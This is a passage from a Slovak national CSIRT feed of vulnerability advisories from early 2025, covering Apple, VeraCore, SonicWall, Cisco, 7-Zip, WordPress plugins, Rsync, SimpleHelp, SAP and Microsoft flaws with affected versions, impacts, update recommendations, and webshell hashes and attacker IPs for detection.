Zraniteľnosť v komponente AppleMobileFileIntegrity (macOS Ventura, macOS Sonoma a macOS Sequoia) spočíva v nedostatočnom overovaní digitálnych podpisov aplikácií a možno ju zneužiť na získanie neoprávneného prístupu k citlivým údajom používateľa.

CVE-2025-24118 (CVSS skóre 9,8)

Jadro operačných systímov macOS Sonoma, macOS Sequoia a iPadOS obsahuje zraniteľnosť spočívajúcu v nesprávnom manažmente dostupnej operačnej pamäte a možno ju zneužiť na zneprístupnenie služby a zápis do kernel pamäte.

CVE-2025-24123, CVE-2025-24124 (CVSS skóre 9,8)

Zraniteľnosti v komponente CoreMedia (tvOS, watchOS, macOS Ventura, macOS Sonoma, macOS Sequoia, iPadOS, iOS a visionOS) možno podvrhnutím špeciálne vytvoreného súboru zneužiť na zneprístupnenie služby.

CVE-2025-24126 (CVSS skóre 9,8)

Funkcionalita AirPlay na zariadeniach s operačným systémom tvOS, watchOS, macOS Sequoia, iPadOS, iOS a visionOS obsahuje zraniteľnosť spočívajúcu v nesprávnom overovaní používateľských vstupov. Útočník nachádzajúci sa v lokálnej sieti by ju mohol zneužiť na poškodenie obsahu operačnej pamäte a zneprístupnenie služby.

CVE-2025-24130 (CVSS skóre 9,8)

Operačné systémy macOS Ventura, macOS Sonoma a macOS Sequoia obsahujú zraniteľnosť v komponente PackageKit, ktorú možno zneužiť na modifikáciu chránených častí súborového systému zariadenia.

CVE-2025-24131 (CVSS skóre 9,8)

Zraniteľnosť tvOS, watchOS, macOS Sequoia, iPadOS, iOS a visionOS (komponent AirPlay) spočíva v nesprávnom manažmente dostupnej operačnej pamäte a umožňuje zneprístupnenie služby.

CVE-2025-24135 (CVSS skóre 9,8)

Nedostatočné overovanie správ v rámci komponentu System Extensions (macOS Sequoia) možno zneužiť na eskaláciu privilégií.

CVE-2025-24139 (CVSS skóre 9,8)

Podvrhnutím špeciálne vytvorených súborov možno na macOS Ventura, macOS Sonoma a macOS Sequoia spôsobiť pád komponentu sips a následné zneprístupnenie služby.

CVE-2025-24146 (CVSS skóre 9,8)

Nesprávne spracovanie citlivých údajov v rámci komponentu Photos Storage na zariadeniach s macOS Ventura, macOS Sonoma a macOS Sequoia má za následok prítomnosť citlivých údajov v systémových logoch, čo možno neužiť na získanie neoprávneného prístupu k citlivým údajom.

CVE-2025-24151 (CVSS skóre 9,8)

Operačné systémy macOS Ventura, macOS Sonoma a macOS Sequoia obsahujú v komponente SMB zraniteľnosť umožňujúcu zneprístupnenie služby a poškodenie obsahu kernel pamäte.

CVE-2025-24156 (CVSS skóre 9,8)

Eskalácia privilégií na macOS Ventura, macOS Sonoma a macOS Sequoia je umožnená existenciou zraniteľnosti v komponente Xsan.

CVE-2025-24163 (CVSS skóre 9,8)

Zraniteľnosť v komponente CoreAudio v rámci tvOS, watchOS, macOS Sonoma, macOS Sequoia, iPadOS, iOS a visionOS možno zneužiť na zneprístupnenie služby.

CVE-2025-24169 (CVSS skóre 9,8)

Zraniteľnosť v komponente Passwords v Safari a macOS Sequoia spočíva v nedostatočnom ošetrení citlivých údajov v rámci logovania a možno ju zneužiť na obídenie mechanizmov autentifikácie v rámci rozšírení webového prehliadača.

CVE-2025-24174 (CVSS skóre 9,8)

iCloud Photo Library v rámci macOS Ventura, macOS Sonoma a macOS Sequoia spočíva v nesprávnom overovaní nastavení ochrany súkromia a možno ju zneužiť na obídenie bezpečnostných mechanizmov.

CVE-2025-24085 (CVSS skóre 7,8)

Aktívne zneužívaná zero-day zraniteľnosť v komponente Core Media používanom v rámci operačných systémov tvOS, watchOS, macOS Sequoia, iOS, iPadOS a visionOS spočíva v použití odalokovaného miesta v pamäti a podvrhnutím škodlivej aplikácie ju možno zneužiť na eskaláciu privilégií.

Pozn.: Na základe informácií od spoločnosti Apple je zraniteľnosť CVE-2025-24085 v súčasnosti aktívne zneužívaná pri útokoch na zariadenia s operačným systémom iOC vo verziách starších ako 17.2.

Ostatné zraniteľnosti:

Ostatné zraniteľnosti možno zneužiť na spôsobenie širokého spektra škôd špecifikovaných v časti „Možné škody“.

Možné škody:

Vykonanie škodlivého kódu
Injekcia príkazov
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Zneprístupnenie služby
Obídenie bezpečnostného prvku
Spoofing

Odporúčania:

Odporúčame vykonať aktualizáciu zraniteľných systémov na verzie iOS 18.3, iPadOS 18.3, macOS Sequoia 15.3, watchOS 11.3, visionOS 2.3, tvOS 18.3, alebo špecifikované na webstránkach výrobcu.

Zdroje:

Zero-day zraniteľnosti Advantive VeraCore

Marian Danko — Tue, 11 Feb 2025 13:33:48 +0000

Advantive VeraCore obsahuje dve aktívne zneužívané zraniteľnosti, z ktorých jedna umožňuje nahrávanie súborov do ľubovoľného priečinku zraniteľnej aplikácie a druhá umožňuje získať kontrolu nad databázou. Útočníci zo skupiny XE Group zreťazujú tieto zraniteľnosti pre nasadenie webshellov.

Zraniteľné systémy:

Advantive VeraCore 2025.1.0 a staršie

Opis činnosti:

CVE-2024-57968 (CVSS skóre 9,9)

Kritická zero-day zraniteľnosť Advantive VeraCore umožňuje vzdialeným autentifikovaným útočníkom útok typu path traversal a nahrávanie súborov do priečinkov, ktoré na to neboli určené. Zraniteľnosť súvisí s nedostatočným overovaním používateľských vstupov pri nahrávaní súborov komponentom /VeraCore/OMS/upload.aspx.

CVE-2025-25181 (CVSS skóre 5,8)

Zero-day zraniteľnosť v komponente timeoutWarning.asp umožňuje vzdialeným neautentifikovaným útočníkom zneužiť parameter PmSess1 pre vykonávanie ľubovoľných príkazov SQL. Zraniteľnosť vyplýva z nedostatočnej sanitizácie používateľských vstupov, vstupujúcich do daného parametra. Umožňuje získať kontrolu nad zraniteľnou aplikáciou, čítať, meniť a mazať dáta v databáze.

Zraniteľnosti aktívne zneužíva skupina XE Group. Zreťazením týchto zraniteľností získavajú útočníci schopnosť nahrávať na zraniteľné systémy webshelly ASPXSpy, čo im umožňuje vytvoriť si zadné vrátka do systému. Prvé odhalené zneužitie CVE-2025-25181 sa datuje do roku 2020.

Možné škody:

Únik citlivých informácií
Modifikácia informácií
Získanie prístupu do systému

Odporúčania:

Pre odstránenie CVE-2024-57968 aktualizujte Advantive VeraCore aspoň na verziu 2024.4.2.1. Pre CVE-2025-25181 aktualizácia zatiaľ nie je dostupná. Odporúčame preveriť prítomnosť IoC v logoch sieťových a bezpečnostných prvkov.

IoC (kompletná informácia tu):

SHA1: 032dd95a1299f37aaa76318945e030eb7da94da9 – webshell z roku 2020

SHA1: 84e7f4ff1f93a4297c2e2c4e54f14edb18396b60 – webshell z roku 2020

SHA1: 16db01fe25b0c09e18d13f38c88a4ead5d10e323 – webshell z roku 2020

SHA1: ede5ddb97b98d80440553b23dfc19fdb4adc7499 – webshell z roku 2024

SHA1: 9e928a26aa3c0e6eb8e709fc55ea12dcf7e02ff9 – zraniteľná verzia upload.aspx

171.227.250.249 – nahrávanie webshellov

123.20.29.193 – interakcia s webshellmi

222.253.102.94 – IP adresa C&C servera XE Group a interakcia s webshellmi

Odkazy:

Mesačná správa CSIRT.SK – december 2024

Marian Danko — Fri, 07 Feb 2025 11:57:42 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci december 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 12/2024 PDF (1 469 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Aktívne zneužívaná kritická zero-day zraniteľnosť v zariadeniach SonicWall Secure Mobile Access 1000

Marian Danko — Mon, 27 Jan 2025 16:16:57 +0000

Spoločnosť SonicWall vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zero-day zraniteľnosť v zariadeniach SonicWall Secure Mobile Access série 1000. CVE-2025-23006 možno zneužiť na vzdialené vykonanie systémových príkazov a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

SonicWall Secure Mobile Access série 1000 vo verziách 12.4.3-02804 (platform-hotfix) a starších

Opis zraniteľnosti:

CVE-2025-23006 (CVSS skóre 9,8)

Kritická zraniteľnosť v manažmentových konzolách AMC (Appliance Management Console) a CMC (Central Management Console) spočíva v deserializácii nedôveryhodných dát a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vykonanie príkazov v operačnom systéme a získanie úplnej kontroly nad systémom.

Zraniteľnosť je v súčasnosti aktívne zneužívaná útočníkmi.

Možné škody:

Vzdialené vykonanie príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Spoločnosť SonicWall odporúča vykonať bezodkladnú aktualizáciu zasiahnutých systémov aspoň na verziu 12.4.3-02854. Výrobca taktiež odporúča limitovať prístup k AMC a CMC manažmentovým rozhraniam len na dôveryhodné zdroje. Kompletný návod môžete nájsť na stránke výrobu, v časti „Best Practices for Securing the Appliance“.

Zdroje:

Zraniteľnosti v produktoch Cisco Meeting Management, Secure Endpoint Connector a BroadWorks

Marian Danko — Mon, 27 Jan 2025 16:15:25 +0000

Spoločnosť Cisco vydala bezpečnostné aktualizácie na svoje produkty Meeting Management, Secure Endpoint Connector (Linux, Mac a Windows verzie), Secure Endpoint Private Cloud a BroadWorks, ktoré opravujú viaceré zraniteľnosti. Kritickú zraniteľnosť CVE-2025-20156 v Cisco Meeting Management možno zneužiť na eskaláciu privilégií a získanie úplnej kontroly nad systémom. Ostatné zraniteľnosti umožňujú zneprístupnenie služby.

Zraniteľné systémy:

Cisco Meeting Management vo verziách starších ako 3.9.1 a 3.10
Cisco Secure Endpoint Connector for Linux vo verziách starších ako 1.25.1
Cisco Secure Endpoint Connector for Mac vo verziách starších ako 1.24.4
Cisco Secure Endpoint Connector for Linux vo verziách starších ako 1.25.1
Cisco Secure Endpoint Connector for Windows 7.5.X vo verziách starších ako 7.5.20
Cisco Secure Endpoint Connector for Windows 8.4.X vo verziách starších ako 8.4.3
Cisco Secure Endpoint Private Cloud vo verziách starších ako 4.2.0 (bez aktualizácie konektorov)
Cisco BroadWorks vo verziách starších ako RI.2024.11

Opis zraniteľnosti:

Cisco Meeting Management:

CVE-2025-20156 (CVSS skóre 9,9)

Kritická zraniteľnosť o označením CVE-2025-20156 spočíva v nedostatočnom overovaní autorizácie v rámci REST API. Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených API požiadaviek mohol zneužiť na eskaláciu privilégií na úroveň administrátora a získanie úplnej kontroly nad uzlami manažovanými prostredníctvom Cisco Meeting Management.

Cisco Secure Endpoint Connector (Linux, Max, Windows verzie), Cisco Secure Endpoint Private Cloud:

CVE-2025-20128 (CVSS skóre 5,3)

Zraniteľnosť sa nachádza v komponente ClamAV a spočíva v podtečení celočíselnej premennej, ktoré možno zneužiť na pretečenie medzipamäte haldy počas dešifrovania OLE2 (Object Linking and Embedding 2). Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených súborov mohol zneužiť na deaktiváciu antivírusového komponentu. Na zraniteľnosť je v súčasnosti dostupný aj proof-of-concept kód demonštrujúci postup jej zneužitia.

Pozn.: Cisco produkty Secure Email Gateway a Secure Web Appliance nie sú predmetnou zraniteľnosťou zasiahnuté.

Cisco BroadWorks:

CVE-2025-20165 (CVSS skóre 7,5)

Nesprávny manažment pamäte v rámci komponentu pre spracovanie SIP (Session Initiation Protocol) by vzdialený neautentifikovaný útočník zaslaním veľkého množstva špeciálne vytvorených SIP požiadaviek mohol zneužiť na zahltenie dostupných prostriedkov zariadenia a zneprístupnenie služby.

Možné škody:

Eskalácia privilégií
Získanie úplnej kontroly nad systémom
Zneprístupnenie služby

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu Cisco Meeting Management na verziu 3.9.1 alebo 3.10, Cisco Secure Endpoint Connector na verzie 1.25.1 (Linux), 1.24.4 (Mac), 7.5.20 alebo 8.4.3 (Windows), Secure Endpoint Private Cloud na verziu 4.2.0 a Cisco BroadWorks na verziu RI.2024.11.

Zdroje:

Zraniteľnosť v 7-Zip umožňuje obídenie ochrany Mark-of-the-Web a vykonanie škodlivého kódu

Marian Danko — Mon, 27 Jan 2025 15:52:17 +0000

Vývojári komprimačného nástroja 7-Zip vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-0411 možno podvrhnutím špeciálne vytvorených súborov zneužiť na obídenie bezpečnostného mechanizmu „Mark of the Web“ a vzdialené vykonanie kódu.

Zraniteľné systémy:

7-Zip vo verziách starších ako 24.09

Opis zraniteľnosti:

CVE-2025-0411 (CVSS skóre 7,0)

Zraniteľnosť s označením CVE-2025-0411 by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvorených archívov mohol zneužiť na obídenie bezpečnostného mechanizmu MotW (Mark of the Web) a následné vykonanie škodlivého kódu. Pri dekomprimácii archívov stiahnutých z externých zdrojov nedochádza k propagácii indikátora MotW do metadát rozbaľovaných súborov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí navštíviť škodlivú webovú stránku alebo otvoriť škodlivý súbor. Zraniteľnosť odhalili výskumníci zo Zero Day Initiative (ZDI).

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu 7-Zip na verziu 24.09 alebo novšiu.

Zdroje:

https://www.zerodayinitiative.com/advisories/ZDI-25-045/

https://www.cve.org/CVERecord?id=CVE-2025-0411

https://www.openwall.com/lists/oss-security/2025/01/24/6

Kritické zraniteľnosti vo WordPress pluginoch RealHomes Theme a Easy Real Estate

Marian Danko — Mon, 27 Jan 2025 15:49:54 +0000

Bezpečnostní výskumníci zo spoločnosti Patchstack zverejnili informácie o kritických zraniteľnostiach vo WordPress pluginoch RealHomes Theme a Easy Real Estate, ktoré možno zneužiť na eskaláciu privilégií, získanie administrátorského prístupu a úplnej kontroly nad systémom.

Zraniteľné systémy:

WordPress plugin RealHomes Theme vo verziách starších ako 4.3.6 (vrátane)
WordPress plugin Easy Real Estate vo verziách starších ako 2.2.6 (vrátane)

Pozn.: Zraniteľnosti boli odhalené a nahlásené výrobcovi už v septembri 2024, ale zostávajú naďalej neopravené. Vzhľadom na ich závažnosť možno očakávať pokusy o ich zneužitie.

Opis zraniteľnosti:

WordPress plugin RealHomes Theme:

CVE-2024-32444 (CVSS skóre 9,8)

Kritická zraniteľnosť vo funkcii inspiry_ajax_register spočíva v nedostatočnom overovaní autorizácie v rámci mechanizmu registrácie používateľov. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na vytvorenie administrátorského účtu a získanie úplnej kontroly nad systémom.

WordPress plugin Easy Real Estate:

CVE-2024-32555 (CVSS skóre 9,8)

Kritická zraniteľnosť sa nachádza vo funkcionalite umožňujúcej prihlásenie prostredníctvom konta na sociálnych sieťach, kde v rámci funkcie ere_social_register nedochádza k overovaniu vlastníctva zadanej e-mailovej adresy. Vzdialený neautentifikovaný útočník by zaslaním špeciálne vytvorenej POST požiadavky obsahujúcej e-mailovú adresu existujúceho administrátorského účtu mohol zneužiť na získanie neoprávneného prístupu do systému a získanie úplnej kontroly nad systémom. Zneužitie zraniteľnosti vyžaduje, aby útočník disponoval e-mailovou adresou administrátora.

Možné škody:

Eskalácia privilégií
Získanie neoprávneného prístupu do systému
Získanie úplnej kontroly nad systémom

Odporúčania:

Na uvedené zraniteľnosti v súčasnosti nie sú dostupné bezpečnostné aktualizácie. Administrátorom odporúčame predmetný plugin až do vydania záplat deaktivovať alebo odinštalovať, sledovať stránky výrobcu a po vydaní záplat vykonať bezodkladnú aktualizáciu zasiahnutých systémov. Taktiež odporúčame preveriť logy na prítomnosť pokusov o zneužitie zraniteľnosti a integritu databázy a samotného redakčného systému WordPress.

Zdroje:

Kritická zraniteľnosť v nástroji pre prenos a synchronizáciu súborov Rsync

Marian Danko — Fri, 17 Jan 2025 15:23:43 +0000

Vývojári open source nástroja pre prenos a synchronizáciu súborov RSYNC vydali bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností, z čoho 1 je označená ako kritická. CVE-2024-12084 možno zneužiť na vzdialené vykonanie kódu. Zreťazením zraniteľností CVE-2024-12084 a CVE-2024-12085 možno získať úplnú kontrolu nad zraniteľnými systémami.

Zraniteľné systémy:

Rsync vo verziách starších ako 3.4.0

Pozn.:

Zneužitie zraniteľnosti vyžaduje len anonymný read-access prístup
Rsync je využívaný aj v rámci zálohovacích technológií Rclone, DeltaCopy, ChronoCopy, verejných repozitároch pre distribúciu súborov a v nástrojoch pre manažment serverov a cloudovej infraštruktúry

Opis zraniteľnosti:

CVE-2024-12084 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2024-12084 v komponente Rsync Daemon spočíva v nesprávnom overovaní dĺžky kontrolných súčtov. Zraniteľnosť možno zápisom do pamäte mimo povolených hodnôt zneužiť na vzdialené vykonanie kódu.

CVE-2024-12085 (CVSS skóre 7,5)

Zraniteľnosť možno modifikáciou dĺžky kontrolných súčtov zneužiť na získanie neoprávneného prístupu k citlivým údajom v neinicializovanom zásobníku.

CVE-2024-12086 (CVSS skóre 6,1)

CVE-2024-12086 by vzdialený útočník mohol zneužiť na enumeráciu a rekonštrukciu ľubovoľných súborov z klientov.

CVE-2024-12087 (CVSS skóre 6,5)

CVE-2024-12087 spočíva v nesprávnom overovaní symbolických liniek pri použití režimu –inc-recursive a možno ju zneužiť na zápis súborov mimo povolené priečinky.

Zraniteľnosti s označením CVE-2024-12088 a CVE-2024-12747 spočívajú v nesprávnom overovaní symbolických liniek a možno ich zneužiť na eskaláciu privilégií, vykonanie neoprávnených zmien v systéme a získanie neoprávneného prístupu k citlivým údajom.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Eskalácia privilégií
Získanie úplnej kontroly nad systémom

Odporúčania:

Na zraniteľných systémoch odporúčame vykonať bezodkladnú aktualizáciu Rync na verziu 3.4.0. Odporúčame tiež nastaviť vyžadovanie autentifikácie.

Zdroje:

Kritické zraniteľnosti v nástroji pre vzdialený prístup SimpleHelp

Marian Danko — Fri, 17 Jan 2025 15:10:22 +0000

Vývojári riešenia pre vzdialený prístup SimpleHelp vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú 3 kritické zraniteľnosti. Kombináciou uvedených zraniteľností možno získať úplnú kontrolu nad zraniteľnými systémami.
[Aktualizované 30.1.2025]

Zraniteľné systémy:

SimpleHelp v5.5 vo verziách starších ako v5.5.8
SimpleHelp v5.4 vo verziách starších ako v5.4.10
SimpleHelp v5.3 vo verziách starších ako v5.3.9

Opis zraniteľnosti:

CVE-2024-57726 (CVSS skóre 9,9)

Zraniteľnosť spočívajúcu v chýbajúcich mechanizmoch overovania oprávnení v rámci bližšie nešpecifikovaných funkcií v backende aplikácie možno zneužiť na eskaláciu privilégií štandardných technických účtov na administrátorské.

CVE-2024-57727 (CVSS skóre 7,5)

Zraniteľnosť s identifikátorom CVE-2024-57727 možno zneužiť na stiahnutie ľubovoľných súborov zo súborového systému zariadenia a získať tým neoprávnený prístup k citlivým údajom, vrátane konfigurácie a prihlasovacích údajov. Uvedené údaje možno zneužiť na získanie neoprávneného prístupu do systému a realizáciu ďalších útokov. Zneužitie zraniteľnosti nevyžaduje autentifikáciu.

CVE-2024-57728 (CVSS skóre 7,2)

CVE-2024-57728 by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol zneužiť na nahratie súborov na SimpleServer hosty a vzdialené vykonanie kódu.

Aktualizácia 30.1.2025:

Bezpečnostní výskumníci z firmy Arctic Wolf varujú pred útokmi na systémy so SimpleHelp RMM. Na základe dostupných zistení útočníci zneužívajú uniknuté prihlasovacie údaje alebo zraniteľnosti CVE-2024-57726, CVE-2024-57727 a CVE-2024-57728 pre prienik do zraniteľných systémov.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Eskalácia privilégií
Získanie úplnej kontroly nad systémom

Odporúčania:

Výrobca odporúča bezodkladnú aktualizáciu zasiahnutých systémov na verzie v5.5.8, v5.4.10 alebo v5.3.9, preventívnu zmenu hesiel administrátorských a technických účtov a limitovanie prihlasovania k týmto účtom len na dôveryhodné IP adresy.

Zdroje:

Kritické zraniteľnosti vo webových aplikačných serveroch SAP NetWeaver

Marian Danko — Fri, 17 Jan 2025 14:05:42 +0000

Spoločnosť SAP vydala bezpečnostné aktualizácie svojho webového aplikačného servera NetWeaver, ktoré opravujú 8 zraniteľností, z čoho 2 sú označené ako kritické. CVE-2025-0070 a CVE-2025-0066 možno zneužiť na eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom.

Zraniteľné systémy:

SAP NetWeaver Application Server Java vo verzii WD-RUNTIME 7.50
SAP NetWeaver AS JAVA (User Admin Application) vo verziách ENGINEAPI 7.50, SERVERCORE 7.50, UMEADMIN 7.50
SAP NetWeaver Application Server for ABAP and ABAP Platform vo verziách 7.22EXT, 7.53, 7.54, 7.77, 7.89, 7.93, 7.97, 8.04, 9.12, 9.13, 9.14, KERNEL 7.22, KERNEL 7.53, KRNL64NUC 7.22, KRNL64UC 7.22, KRNL64UC 7.53
SAP NetWeaver Application Server for ABAP and ABAP Platform vo verziách SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 758, SAP_BASIS 912, SAP_BASIS 913, SAP_BASIS 914

Opis zraniteľnosti:

CVE-2025-0070 (CVSS skóre 9,9)

Bližšie nešpecifikovaná kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený autentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií a úplné narušenie dôvernosti, integrity a dostupnosti systému.

CVE-2025-0066 (CVSS skóre 9,9)

Kritická zraniteľnosť spočívajúcu v nesprávnom riadení prístupov by vzdialený autentifikovaný útočník mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom a úplné narušenie dôvernosti, integrity a dostupnosti systému.

CVE-2025-0063 (CVSS skóre 8,8)

Zraniteľnosť spočíva v nedostatočnom overovaní autorizácie pre niektoré moduly RFC a vzdialený autentifikovaný útočník by ju prostredníctvom SQL injekcie mohol zneužiť na získanie neoprávneného prístupu k databáze Informix.

Ostatné zraniteľnosti možno zneužiť na vzdialené vykonanie kódu a získanie neoprávneného prístupu k citlivým údajom.

Možné škody:

Neoprávnený prístup k citlivým údajom
Eskalácia privilégií
Úplné narušenie dôvernosti, integrity a dostupnosti systému
Vzdialené vykonanie kódu

Odporúčania:

Odporúčame bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované výrobcom.

Zdroje:

Microsoft v januárovom Patch Tuesday opravil 12 kritických zraniteľností

Marian Danko — Fri, 17 Jan 2025 13:46:06 +0000

Spoločnosť Microsoft vydala v januári 2025 balík opráv pre portfólio svojich produktov opravujúci 161 zraniteľností, z ktorých 58 umožňuje vzdialené vykonanie kódu. Kritické zraniteľnosti sa nachádzajú v Microsoft Digest Authentication, NEGOEX, BranchCache, Windows Remote Desktop Services, Windows OLE, Windows RMCAST, Windows NTLM V1, Azure Marketplace SaaS Resources, Microsoft Purview a Microsoft Excel a možno ich zneužiť vzdialené vykonanie škodlivého kódu, eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom. Windows Hyper-V NT Kernel Integration VSP obsahuje aktívne zneužívané zraniteľnosti umožňujúce eskaláciu privilégií (CVE-2025-21333, CVE-2025-21334, CVE-2025-21335).

Zraniteľné systémy:

.NET 8.0 installed on Linux
.NET 8.0 installed on Mac OS
.NET 8.0 installed on Windows
.NET 9.0 installed on Linux
.NET 9.0 installed on Mac OS
.NET 9.0 installed on Windows
Marketplace SaaS
Microsoft .NET Framework 3.5 AND 4.6.2/4.7/4.7.1/4.7.2
Microsoft .NET Framework 3.5 AND 4.7.2
Microsoft .NET Framework 3.5 AND 4.8
Microsoft .NET Framework 3.5 AND 4.8.1
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2
Microsoft .NET Framework 4.6/4.6.2
Microsoft .NET Framework 4.8
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Access 2016 (32-bit edition)
Microsoft Access 2016 (64-bit edition)
Microsoft AutoUpdate for Mac
Microsoft Edge (Chromium-based)
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office LTSC for Mac 2024
Microsoft Office for Android
Microsoft Office for Mac
Microsoft Office for Universal
Microsoft Office for iOS
Microsoft OneNote for Mac
Microsoft Outlook 2016 (32-bit edition)
Microsoft Outlook 2016 (64-bit edition)
Microsoft Outlook for Mac
Microsoft Purview
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Visual Studio 2017 version 15.9 (includes 15.0 – 15.8)
Microsoft Visual Studio 2019 version 16.11 (includes 16.0 – 16.10)
Microsoft Visual Studio 2022 version 17.10
Microsoft Visual Studio 2022 version 17.12
Microsoft Visual Studio 2022 version 17.6
Microsoft Visual Studio 2022 version 17.8
Office Online Server
On-Premises Data Gateway
Power Automate for Desktop
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)

Opis činnosti:

Kritické zraniteľnosti:

CVE-2025-21298 (CVSS skóre 9,8)

Zraniteľnosť v komponente Windows OLE (Object Linking and Embeding) využívanom v rámci e-mailového klienta Microsoft Outlook by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených e-mailov mohol zneužiť na vzdialené vykonanie kódu. Úspešné zneužitie zraniteľnosti vyžaduje zobrazenie náhľadu alebo otvorenie špeciálne vytvorenej e-mailovej správy. Spoločnosť Microsoft odporúča nastaviť Microsoft Outlook, aby e-mailové správy zobrazoval v plaintextovom režime, v rámci ktorého nedochádza k zobrazeniu obrázkov, špecializovaných fontov, animácií a ďalšieho zneužiteľného obsahu. Kompletný návod môžete nájsť na stránke výrobcu.

CVE-2025-21307 (CVSS skóre 9,8)

Použitie odalokovaného miesta v pamäti v rámci ovládača Windows RMCAST (Reliable Multicast Transport) možno zaslaním špeciálne vytvorených paketov na otvorené PGM (Pragmatic General Multicast) sockety zneužiť na vzdialené vykonanie kódu. Zraniteľnosť je možné zneužiť len na systémoch, na ktorých je prítomný program počúvajúci na PGM porte. Nakoľko PGM nevykonáva autentifikáciu prichádzajúcich požiadaviek, spoločnosť Microsoft odporúča PGM porty neprevádzkovať voľne dostupné z internetu a prístup k nim limitovať prostredníctvom sieťových a bezpečnostných prvkov.

CVE-2025-21311 (CVSS skóre 9,8)

Komponent Windows NTLM V1 obsahuje kritickú zraniteľnosť, ktorá spočíva v nesprávnej implementácii mechanizmov autentifikácie. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií a úplné narušenie dôvernosti, integrity a dostupnosti systému. Zraniteľnosť je možné mitigovať nastavením LmCompatabilityLvl na hodnotu 5 (maximálna možná hodnota), čo na systémoch znemožní využitie starého protokolu NTLMv1. Bližšie informácie môžete nájsť na stránke výrobcu.

CVE-2025-21380 (CVSS skóre 8,8)

Bližšie nešpecifikovaná zraniteľnosť v Azure Marketplace SaaS Resources spočíva v nesprávnej implementácii mechanizmov riadenia prístupu a vzdialený autentifikovaný útočník by ju mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom. Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a nevyžaduje dodatočnú aktualizáciu systémov.

CVE-2025-21385 (CVSS skóre 8,8)

